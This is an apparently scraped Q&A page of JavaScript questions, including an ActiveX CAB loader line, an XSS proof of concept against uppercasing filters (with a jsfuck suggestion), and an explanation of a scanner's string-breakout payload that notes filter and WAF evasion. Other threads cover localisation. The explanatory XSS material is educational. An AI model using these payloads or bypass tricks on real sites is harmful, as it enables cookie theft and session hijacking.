Please explain me what this javascript code does - javascript

I have a javascript with the following code:
caburl="http://"+top.window.location.host+"/ims.cab";
cabver="1,1,1,5";
document.write("<object id='IMS' width=0 height=0 classid='CLSID:8246AC2B-4733-4964-A744-4BE60C6731D4' codebase='"+caburl+"#version="+cabver+"' style='display:none'></object>");
From the above lines, I can understand that the first line specifies the location of cab file. Second Line specifies the cab file version.
Can anyone please explain me, what the third line does..which starts with Document.Write....
I dont have any knowledge of Javascript and want to convert the task performed by this javascript into my exe file.
Expecting a quick and positive response.

The third line writes the generated string value to the page (concatenating strings with the values of the caburl and cabver variables).
This adds an object element to the page with the values in the string.
From the value classid and the use of cab in the variable names, I would deduce this is an ActiveX component (so would only work on IE). This is normally used for installing the component on the client computer.

It joins a string together to make an html tag, and then using document.write appends it to the HTML document.

The third line writes the string enclosed inside the write() function into the document being displayed in the browser.
Note that because of the style='display:none' text in the string , the <object> won't be visible in the browser.

The code will install Java CAB file called "ims.cab" hosted on some server. See this question as well for reference: extract cab file and execute the exe file(inside the cab file) automatically
To do this with EXE of your own, you can take a look here: http://www.codeproject.com/KB/files/CABCompressExtract.aspx
Let us know what language you intend to use (C++, C# etc) for further help.

Related

Exploit an XSS when injected Javascript code is returned capitalized

I have found an XSS vulnerability in a piece of code, as I'm able to inject Javascript code in it.
I want to generate the simple alert PoC, but I'm not able to do so as the JS code returned by the server is always capitalized. For example, when I inject the following code:
Text sample <script>alert(document.cookie)</script>
The server respond with the page containing the following:
Text sample <script>ALERT(DOCUMENT.COOKIE)</script>
Which obviously does not print the cookie as JS is case sensitive.
Is there a way to transform the code injected in lowercase before it gets rendered or a similar solution?
Note: Javascript is enabled and if I modify manually the code in the browser console transforming it in lowercase, I'm getting the cookie printed.
No, you do not have control over the transformation and you cannot somehow change it back to lowercase before execution.
However, you can inject JavaScript code which is not affected by the capitalisation of the characters. See jsfuck, which doesn't need alphanumeric source characters at all, and use a similar approach (you can actually use digits and some characters).

Why is this masked JS code in a GET parameter: '*alert(13)*' executed on my page?

We had a WhiteHat scan done of our site, and one of the vulnerabilites they returned was our URL appended with whscheck'*alert(13)*'a/. When we run the full URL (https://oursite.com/phorders3/index.php/whscheck'*alert(13)*'a/), the site loads and an alert with the value of 13 pops. Can anyone explain how this works? What exactly are the asterisks and the a/ doing?
The code in your page is using the value from the URL in a string literal in the Javascript, without escaping the value properly. That means that anyone can just put Javascript in the URL and it will execute in the page.
That could for example be used for cross site scripting by linking to your site with such an URL, and when someone uses the link the script will run in their browser, pick up some information that is private to that user and send it somewhere.
The apostrophes and the asterisks are used to break out of a string literal. If you have some code like this in the Javascript in the page:
var s = '<? echo $variable ?>';
where the variable contains the value from the URL, it would end up like this in the rendered page:
var s = 'whscheck'*alert(13)*'a';
The apostrophe makes the string literal end, and makes the following expression a part of the Javascript code instead of content in a string.
The asterisk is just an operator between the expressions. It's easier to put in an URL than the + operator that would otherwise be a natural choise.
More than likely this injection is landing somewhere between script tags () and the URL is being reflected in some sort of function or variable inside the script. Here is a breakdown of the injection and how/why it works.
' breaks out of the string literal in the variable definition
* causes the javascript to focus on that portion of code first and is often a way of getting around filters that disallow ;
alert(13) is the proof of concept that causes the alert box with 13 inside to show execution of javascript
* again is more than likely to bypass a filter or WAF blocking ;
' to re-open the string literal to make the syntax of the javascript correct
a is just some arbitrary input to go into the string
/ is to close off the path of the URL itself in what appears to be a RESTful URL structure.
There is an option in the Sentinel interface for you to ask the Whitehat engineers these kinds of questions directly, which is a very helpful resource.

How to apply a localization to a javascript string

I assigned a string to a javascript string object, such like :
var word = "Please input correct verb"
I want this string be in control by resource file in asp.net project. Does it provide the function to replace the string using a ASP.NET syntax to switch languages?
<%$ Resources:Registration, correctverb%>
Thanks.
There are various l18n projects for JavaScript, e.g. http://i18next.com/
If you have ResX files in your ASP project and you want them as JavaScript or JSON files you can convert them here; or via the REST API you could convert a resource file as follows:
$ curl --data-binary #messages.resx \
http://localise.biz/api/convert/resx/messages.json
(example in cURL, which I guess you may not have if you're on Windows)
A common approach for this is creating an HTTP handler that evaluates requests for say files with the extension *.js.axd (or whatever extension you come up with) and then parse the javascript file by replacing defined tokens with the actual localized resource value.
It may be costly only the first time the file is requested but then everything should run smoothly if caching is applied. Here's an example of how to create a handler, parsing the file should be trivial. You could use the same syntax to define localized strings on your file: <% LocalizedResourceName %>

check error in javascript included file and work around

For a select box on our website, we have changed the ajax call request to javascript array file which used to fill the city select box options. These are now filled from the same file containing only js array.
This js only array file is created dynamically on some other server and transferred to static server. Most of the times it works good, but fails occasionally and file got corrupted or not fully transferred. In that case the file contents look like
var cityArray = [{SID : "15",SN : "Rajasthan",cities : [{CID : "677",CN : "Jaipur"}, //syntax error, no eol
So, when we try to use this file, all js stop working.
My question here is how can i check that the included file contains errors and use the legacy method to fill the select box options?
Thanks in advance.
I'd cheat a little:
Use a XMLHttpRequest to fetch a copy of the file as a string instead of adding a <script> tag.
Check if the string has an EOL, if not - add one.
Eval() the string in a try-catch statement.
Not only should that let you use your particular type of 'broken' files, but your script won't fall over if its broken in other ways.

Using resource files (.resx) in javascript

I'm trying to use localization in my project but I can't find a way to access my resx files from javascript. I have been looking around a bit and I don't think the 'AJAX call' method would be ideal for my project since I have quiet a lot of string that need to be fetched and it would just have to spam the server hard!
if I just put it in my HTML then it works with this code:
#using Resources
<p>#Html.Raw(ISt_Localization.January)</p>
I guess one of the things I could do is put all the strings in a hidden div and then get the content from the divs in my javascript but this wouldn't be very effective..
I had a similar situation and in my case, I created a separate partial view which only contained a javascript block where I put all the resource strings required for use in client side logic. Every resource string was defined as a javascript variable. You could also create an associative array.
In your partial view:
var Resources = {
January : "#Html.Raw(ISt_Localization.January)",
February : "#Html.Raw(ISt_Localization.February)",
...
};
You can also try the below thing directly
#using Resources
<script>
var value = '#Resource.January';
/* work with value
.......
.....
*/
</script>
I took a totally different approach.
I want to have the resource strings required by my Javascript files be part of my resx files.
Every key in my resource file which starts with js has to become available in Javascript.
In global.asax, in Application_OnStart I build Javascript files for all supported languages on the fly.
Because this only happens at the start of the application, it does not matter if it takes a few seconds.
Advantages:
All translations in one place (in the rex files which you use for your .NET application (C# or VB), but also for your Javascript code
Always up to date
Very fast, because we are going to use variables to get the translations
Building the Javascript file is easy.
Iterate through all key value pairs in all resx-files. Just pick out the keys starting with _js_.
Save the key value pair in the Javascript file.
So if the key value pair in the resx-file (languageSupport_es.resx) is '_js_Hello', 'Hola',
I write in my Javascript file (languageSupport_es.js) var Hello = 'Hola';
So alert(Hello) will give you 'Hola' if the current language is Spanish.
The only thing I now have to take care of, is using the right 'language Javascript file' is loaded before my other Javascript files.
So if the language is Spanish, I ONLY include my 'Spanish language Javascript file' (languageSupport_es.js) first.
Easy no? If somebody is interested, I can show some example code...

Categories